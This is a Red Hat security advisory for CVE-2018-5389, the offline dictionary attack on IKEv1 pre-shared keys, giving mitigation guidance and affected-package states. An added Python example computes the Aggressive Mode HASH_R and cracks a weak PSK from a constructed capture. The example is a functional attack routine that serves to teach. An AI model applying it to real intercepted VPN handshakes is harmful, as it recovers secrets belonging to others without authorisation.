CVE-2018-5389

Related Vulnerabilities: CVE-2018-5389  

It was found that IKEv1 (and potentially IKEv2) authentication when using a pre-shared key (PSK) is vulnerable to offline dictionary attacks in Main Mode as well as in Aggressive Mode. A man-in-the-middle attacker who intercepted the handshake of two peers authenticating with a PSK, could apply a brute-force attack to recover the shared secret.

Find out more about CVE-2018-5389 from the MITRE CVE dictionary and NIST NVD.

Statement

PSK based authentication should only be used when the randomness and confidentiality of the shared secret can be guaranteed. PSKs should also not be used as group secrets, because the security of a shared PSK is only as strong as the weakest participant in the group. Public key or EAP authentication methods should be used whenever possible. If a PSK must be used, it is essential that the shared secret has a high degree of randomness and is not derived from a low-entropy password, as the IKEv2 specification (RFC 7296) states explicitly.

To use passwords for authentication of IKE/IPsec peers, the IKEv2 protocol supports various methods that are not based on (inherently weak) PSKs and which are not vulnerable to offline dictionary attacks:

RFC 5998: EAP-Only Authentication in IKEv2
RFC 6617: Secure Pre-Shared Key (PSK) Authentication for IKE
RFC 6631: Password Authenticated Connection Establishment with IKEv2
RFC 6628: Efficient Augmented Password-Only Authentication and Key Exchange for IKEv2

As implementations supporting IKE assume the security of provided PSKs, and no mechanism within the protocol allows for password-stretching, we do not anticipate any software fixes becoming available.
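The following is an added example, not code from this advisory or from any of the affected projects. It shows why a low-entropy PSK is fatal: it recomputes the IKEv1 Aggressive Mode HASH_R exactly as RFC 2409 section 5.4 defines it (SKEYID = prf(PSK, Ni_b | Nr_b); HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)) and runs the offline dictionary attack against a constructed capture. Every input to HASH_R except the PSK travels unencrypted in the first two Aggressive Mode messages, so once the exchange is recorded no further traffic is required. The same check, with an additional decryption step, is what the Main Mode variant of the attack does. HMAC-SHA1 as the prf, the byte values of the capture and the wordlist are all assumptions of the example; the strong PSK is generated with the system CSPRNG to show that the attack has nothing to find when the secret is random.

```python
import hashlib
import hmac
import secrets


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf: HMAC with the negotiated hash. HMAC-SHA1 is assumed here."""
    return hmac.new(key, data, hashlib.sha1).digest()


def ikev1_hash_r(psk, ni, nr, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b):
    """HASH_R as the responder computes it in Aggressive Mode (RFC 2409 5.4).

    Everything except psk is visible on the wire in messages 1 and 2.
    """
    skeyid = prf(psk, ni + nr)  # SKEYID = prf(PSK, Ni_b | Nr_b)
    return prf(skeyid, g_xr + g_xi + cky_r + cky_i + sai_b + idir_b)


def crack_psk(captured, observed_hash_r, wordlist):
    """Offline dictionary attack: recompute HASH_R for each candidate PSK and
    compare it with the value taken from the captured second message.
    Returns the recovered PSK, or None if no candidate matches."""
    for candidate in wordlist:
        if hmac.compare_digest(ikev1_hash_r(candidate, **captured), observed_hash_r):
            return candidate
    return None


# Constructed stand-in for a captured Aggressive Mode exchange (not real traffic).
CAPTURED = {
    "ni": bytes([0x11]) * 20,  # initiator nonce
    "nr": bytes([0x22]) * 20,  # responder nonce
    "g_xi": bytes([0x33]) * 128,  # initiator DH public value (1024-bit group)
    "g_xr": bytes([0x44]) * 128,  # responder DH public value
    "cky_i": bytes.fromhex("0102030405060708"),  # initiator cookie
    "cky_r": bytes.fromhex("a1a2a3a4a5a6a7a8"),  # responder cookie
    # SA payload body as offered by the initiator (DOI, situation, proposal...)
    "sai_b": bytes.fromhex("0000000100000001") + bytes([0x55]) * 40,
    # ID payload body of the responder: ID_FQDN (2), protocol 0, port 0, name
    "idir_b": bytes([2, 0, 0, 0]) + b"vpn.example.org",
}

# Constructed wordlist; a real attack would use a password dictionary.
WORDLIST = [b"password", b"123456", b"vpn", b"cisco", b"vpnpassword", b"ipsec"]


def demo():
    """Run the attack twice: against a guessable PSK and against a random one."""
    weak_psk = b"vpnpassword"
    weak_hash_r = ikev1_hash_r(weak_psk, **CAPTURED)
    recovered = crack_psk(CAPTURED, weak_hash_r, WORDLIST)

    strong_psk = secrets.token_bytes(32)  # 256 bits from the OS CSPRNG
    strong_hash_r = ikev1_hash_r(strong_psk, **CAPTURED)
    not_recovered = crack_psk(CAPTURED, strong_hash_r, WORDLIST)

    return recovered, not_recovered


if __name__ == "__main__":
    weak, strong = demo()
    print("weak PSK recovered:", weak)  # b'vpnpassword'
    print("random PSK recovered:", strong)  # None
```

Note that the loop does one HMAC-SHA1 per candidate over a few hundred bytes, so a real attacker tests millions of candidates per second per core, and, as the statement above says, the protocol offers no stretching step that would slow this down. Only the entropy of the PSK itself limits the attack.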

The research paper that describes the problems of using weak PSKs also describes a separate set of attacks against RSA-based IKEv1 authentication; those attacks have different CVE numbers. Libreswan is not vulnerable to them because they require IKEv1 with either "Encryption with RSA" (authentication method value 4) or "Revised encryption with RSA" (value 5), and neither of these authentication methods is implemented by libreswan.

CVSS v3 metrics

NOTE: The following CVSS v3 metrics and score provided are preliminary and subject to review.

CVSS3 Base Score 5.9
CVSS3 Base Metrics CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector Network
Attack Complexity High
Privileges Required None
User Interaction None
Scope Unchanged
Confidentiality High
Integrity Impact None
Availability Impact None

Affected Packages State

Platform Package State
Red Hat Enterprise Linux 7 libreswan Will not fix
Red Hat Enterprise Linux 6 openswan Will not fix
Red Hat Enterprise Linux 6 libreswan Will not fix
Red Hat Enterprise Linux 5 ipsec-tools Will not fix
Red Hat Enterprise Linux 5 openswan Will not fix

Acknowledgements

Red Hat would like to thank CERT for reporting this issue.

External References